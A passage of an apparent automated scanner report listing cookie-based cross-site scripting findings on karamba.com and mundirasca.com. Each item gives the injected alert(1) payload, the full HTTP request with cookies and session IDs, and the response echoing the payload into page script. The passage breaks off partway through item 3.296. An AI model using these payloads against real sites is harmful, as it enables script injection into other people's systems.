This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMb27e8"-alert(1)-"4b3e1647c57; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb27e8"-alert(1)-"4b3e1647c57; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb27e8"-alert(1)-"4b3e1647c57";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.287. http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/click/Karamba.com/ENG/Home/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa02b"-alert(1)-"205ddca80aa was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMaa02b"-alert(1)-"205ddca80aa; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: BO=FMaa02b"-alert(1)-"205ddca80aa; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMaa02b"-alert(1)-"205ddca80aa";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.288. http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/click/Karamba.com/ENG/Home/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27ef6"-alert(1)-"ef0a28ae39e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM27ef6"-alert(1)-"ef0a28ae39e; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM27ef6"-alert(1)-"ef0a28ae39e; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM27ef6"-alert(1)-"ef0a28ae39e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.289. http://www.mundirasca.com/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e90c5"-alert(1)-"70b87b2a49a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMe90c5"-alert(1)-"70b87b2a49a; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: BO=FMe90c5"-alert(1)-"70b87b2a49a; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe90c5"-alert(1)-"70b87b2a49a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.290. http://www.mundirasca.com/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c2f"-alert(1)-"de8074ef0c8 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM34c2f"-alert(1)-"de8074ef0c8; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM34c2f"-alert(1)-"de8074ef0c8; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM34c2f"-alert(1)-"de8074ef0c8";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.291. http://www.mundirasca.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eacb"-alert(1)-"393917c80e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM2eacb"-alert(1)-"393917c80e3; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: BO=FM2eacb"-alert(1)-"393917c80e3; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2eacb"-alert(1)-"393917c80e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.292. http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 680d9"-alert(1)-"970a3606485 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM680d9"-alert(1)-"970a3606485; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM680d9"-alert(1)-"970a3606485; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM680d9"-alert(1)-"970a3606485";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.293. http://www.mundirasca.com/ContactUsChat.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsChat.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bca8"-alert(1)-"3ea28a61f0 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM7bca8"-alert(1)-"3ea28a61f0; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: BO=FM7bca8"-alert(1)-"3ea28a61f0; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7bca8"-alert(1)-"3ea28a61f0";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.294. http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsChat.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca168"-alert(1)-"45edf73b8a was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMca168"-alert(1)-"45edf73b8a; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMca168"-alert(1)-"45edf73b8a; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMca168"-alert(1)-"45edf73b8a";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.295. http://www.mundirasca.com/ContactUsFax.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsFax.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f13"-alert(1)-"1ee1ea8d4dd was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMc2f13"-alert(1)-"1ee1ea8d4dd; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: BO=FMc2f13"-alert(1)-"1ee1ea8d4dd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc2f13"-alert(1)-"1ee1ea8d4dd";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.296. http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsFax.aspx

Issue detail

